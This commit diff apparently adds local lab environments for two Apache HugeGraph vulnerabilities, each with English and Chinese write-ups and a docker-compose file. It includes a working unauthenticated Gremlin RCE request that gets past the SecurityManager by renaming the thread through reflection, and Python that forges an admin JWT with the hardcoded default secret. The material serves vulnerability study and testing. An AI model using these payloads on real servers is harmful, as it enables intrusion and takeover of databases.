first commit

hugegraph/CVE-2024-27348/README.md

@@ -0,0 +1,53 @@
+# Apache HugeGraph Unauthenticated Remote Code Execution (CVE-2024-27348)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache HugeGraph is a fast and highly scalable graph database. It provides graph database capabilities with complete features, excellent performance, and enterprise-level reliability.
+
+A remote code execution vulnerability exists in the Gremlin API of HugeGraph. Gremlin is a graph traversal language that can be implemented in various programming languages such as Groovy, Python, and Java. An attacker is able to use Gremlin API to execute Groovy based Gremlin commands without authentication, which can be used to execute arbitrary commands.
+
+In theory, Apache HugeGraph will use the SecurityManager to restrict the Groovy scripts submitted by users. But the SecurityManager only checks thread names that start with "gremlin-server-exec" or "task-worker". This mechanism can be bypassed by using reflection to modify the current thread name, allowing arbitrary code execution.
+
+References:
+
+- <https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/>
+- <https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-apache-hugegraph-server-cve-2024-27348>
+- <https://github.com/Zeyad-Azima/CVE-2024-27348>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable HugeGraph server 1.2.0:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can access the HugeGraph RESTful API at `http://your-ip:8080`.
+
+## Vulnerability Reproduce
+
+Send a malicious Gremlin query through the Gremlin API endpoint to execute arbitrary commands:
+
+```
+POST /gremlin HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 777
+
+{
+    "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"id\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());",
+    "bindings": {},
+    "language": "gremlin-groovy",
+    "aliases": {}
+}
+```
+
+The command will be executed successfully:
+
+![](1.png)

hugegraph/CVE-2024-27348/README.zh-cn.md

@@ -0,0 +1,51 @@
+# Apache HugeGraph 远程代码执行漏洞（CVE-2024-27348）
+
+Apache HugeGraph 是一款快速、高度可扩展的图数据库。它提供了完整的图数据库功能、出色的性能和企业级的可靠性。
+
+HugeGraph 的 Gremlin API 中存在一个远程代码执行漏洞。Gremlin 是一种图遍历语言，可以在 Groovy、Python 和 Java 等多种编程语言中实现。攻击者能够利用 Gremlin API 在未经身份验证的情况下执行基于 Groovy 的 Gremlin 命令，从而执行任意命令。
+
+理论上，Apache HugeGraph 会使用 SecurityManager 来限制用户提交的 Groovy 脚本。但 SecurityManager 仅检查以“gremlin-server-exec”或“task-worker”开头的线程名称。攻击者通过使用反射修改当前线程名称，可以绕过这一机制，从而实现任意代码执行。
+
+参考链接：
+
+- <https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/>
+- <https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-apache-hugegraph-server-cve-2024-27348>
+- <https://github.com/Zeyad-Azima/CVE-2024-27348>
+
+## 环境搭建
+
+执行如下命令启动一个包含漏洞的 HugeGraph 服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，可通过 `http://your-ip:8080` 访问 HugeGraph 的 RESTful API。
+
+## 漏洞复现
+
+通过 Gremlin API 接口发送恶意的 Gremlin 查询来执行任意命令：
+
+```
+POST /gremlin HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 777
+
+{
+    "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"id\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());",
+    "bindings": {},
+    "language": "gremlin-groovy",
+    "aliases": {}
+}
+```
+
+命令执行成功：
+
+![](1.png)

hugegraph/CVE-2024-27348/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  web:
+    image: vulhub/hugegraph:1.2.0
+    ports:
+      - "8080:8080"
+      - "5005:5005"

hugegraph/CVE-2024-43441/README.md

@@ -0,0 +1,75 @@
+# Apache HugeGraph JWT Token Secret Hardcoding Leads to Authentication Bypass (CVE-2024-43441)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache HugeGraph is a fast and highly scalable graph database. It provides graph database capabilities with complete features, excellent performance, and enterprise-level reliability.
+
+A JWT token secret hardcoding vulnerability exists in Apache HugeGraph. When authentication is enabled but `auth.token_secret` is not configured, HugeGraph will use a hardcoded default JWT secret key with the value `FXQXbJtbCLxODc6tGci732pkH1cyf8Qg`. An attacker can use this default secret key to generate valid JWT tokens and bypass authentication to perform unauthorized operations.
+
+References:
+
+- <https://github.com/advisories/GHSA-f697-gm3h-xrf9>
+- <https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246>
+
+## Environment Setup
+
+Execute the following command to start a Apache HugeGraph 1.3.0 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can access the HugeGraph RESTful API at `http://your-ip:8080`.
+
+By default, Apache HugeGraph supports two authentication modes: HTTP Basic Authentication and JWT Authentication. When starting the docker container, it will use the `PASSWORD` environment variable as the default administrator's password. Then you can access the API using HTTP Basic Authentication with the username "admin" and this password.
+
+If you try to access the API without providing any authentication headers, you will receive the following error:
+
+```json
+{
+    "exception": "class jakarta.ws.rs.NotAuthorizedException",
+    "message": "Authentication credentials are required",
+    "cause": ""
+}
+```
+
+## Vulnerability Reproduce
+
+Besides the default administrator's password, we can also use the default JWT secret key to generate a valid JWT token and bypass the authentication.
+
+Generate a JWT token using the default secret key:
+
+```python
+# Install the jwt library by running `pip install pyjwt`
+import jwt
+
+# Generate JWT token using the default secret
+token = jwt.encode(
+    {
+      "user_name": "admin",
+      "user_id": "-30:admin",
+      "exp": 9739523483
+    },
+    "FXQXbJtbCLxODc6tGci732pkH1cyf8Qg",
+    algorithm="HS256"
+)
+print(f"Generated JWT token: {token}")
+# Output:
+# Generated JWT token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.mnafQi6x9nlMz1OcPQu4xAyiq91Ig5tUFhGsktNXKqg
+```
+
+Use the generated token to access protected endpoints:
+
+```
+GET /graphs HTTP/1.1
+Host: localhost:8080
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.mnafQi6x9nlMz1OcPQu4xAyiq91Ig5tUFhGsktNXKqg
+```
+
+You will receive the following response:
+
+![](1.png)
+
+If you remove the `Authorization` header, you will receive the following error:
+
+![](2.png)

hugegraph/CVE-2024-43441/README.zh-cn.md

@@ -0,0 +1,73 @@
+# Apache HugeGraph JWT Token硬编码导致权限绕过（CVE-2024-43441）
+
+Apache HugeGraph 是一款快速、高度可扩展的图数据库。它提供了完整的图数据库功能，具有出色的性能和企业级的可靠性。
+
+Apache HugeGraph 存在一个 JWT token 密钥硬编码漏洞。当启用了认证但未配置 `auth.token_secret` 时，HugeGraph 将使用一个硬编码的默认 JWT 密钥，其值为 `FXQXbJtbCLxODc6tGci732pkH1cyf8Qg`。攻击者可以使用这个默认密钥生成有效的 JWT token，从而绕过认证执行未经授权的操作。
+
+参考链接：
+
+- <https://github.com/advisories/GHSA-f697-gm3h-xrf9>
+- <https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246>
+
+## 环境搭建
+
+执行如下命令启动 Apache HugeGraph 1.3.0 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，可以通过 `http://your-ip:8080` 访问 HugeGraph 的 RESTful API。
+
+默认情况下，Apache HugeGraph 支持两种认证模式：HTTP基础认证和JWT认证。当启动 docker 容器时，系统会使用环境变量 PASSWORD 中指定的值作为默认管理员的密码。在正常情况下，您可以使用用户名 "admin" 和该密码通过 HTTP 基础认证访问 API。
+
+如果您尝试在不提供任何认证头的情况下访问 API，将会收到如下错误：
+
+```json
+{
+    "exception": "class jakarta.ws.rs.NotAuthorizedException",
+    "message": "Authentication credentials are required",
+    "cause": ""
+}
+```
+
+## 漏洞复现
+
+除了默认管理员密码外，我们还可以使用默认 JWT 密钥生成有效的 JWT token 绕过认证。
+
+生成一个使用默认密钥的 JWT token：
+
+```python
+# 安装 jwt 库，运行 `pip install pyjwt`
+import jwt
+
+# 使用默认密钥生成 JWT token
+token = jwt.encode(
+    {
+      "user_name": "admin",
+      "user_id": "-30:admin",
+      "exp": 9739523483
+    },
+    "FXQXbJtbCLxODc6tGci732pkH1cyf8Qg",
+    algorithm="HS256"
+)
+print(f"Generated JWT token: {token}")
+# Output:
+# Generated JWT token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.mnafQi6x9nlMz1OcPQu4xAyiq91Ig5tUFhGsktNXKqg
+```
+
+使用生成的 token 访问受保护的端点：
+
+```
+GET /graphs HTTP/1.1
+Host: localhost:8080
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.mnafQi6x9nlMz1OcPQu4xAyiq91Ig5tUFhGsktNXKqg
+```
+
+您将收到如下响应：
+
+![](1.png)
+
+如果您移除 `Authorization` 头，您将收到如下错误：
+
+![](2.png)

hugegraph/CVE-2024-43441/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+  web:
+    image: vulhub/hugegraph:1.3.0
+    environment:
+      - PASSWORD=vulhub
+    ports:
+      - "8080:8080"
+      - "5005:5005"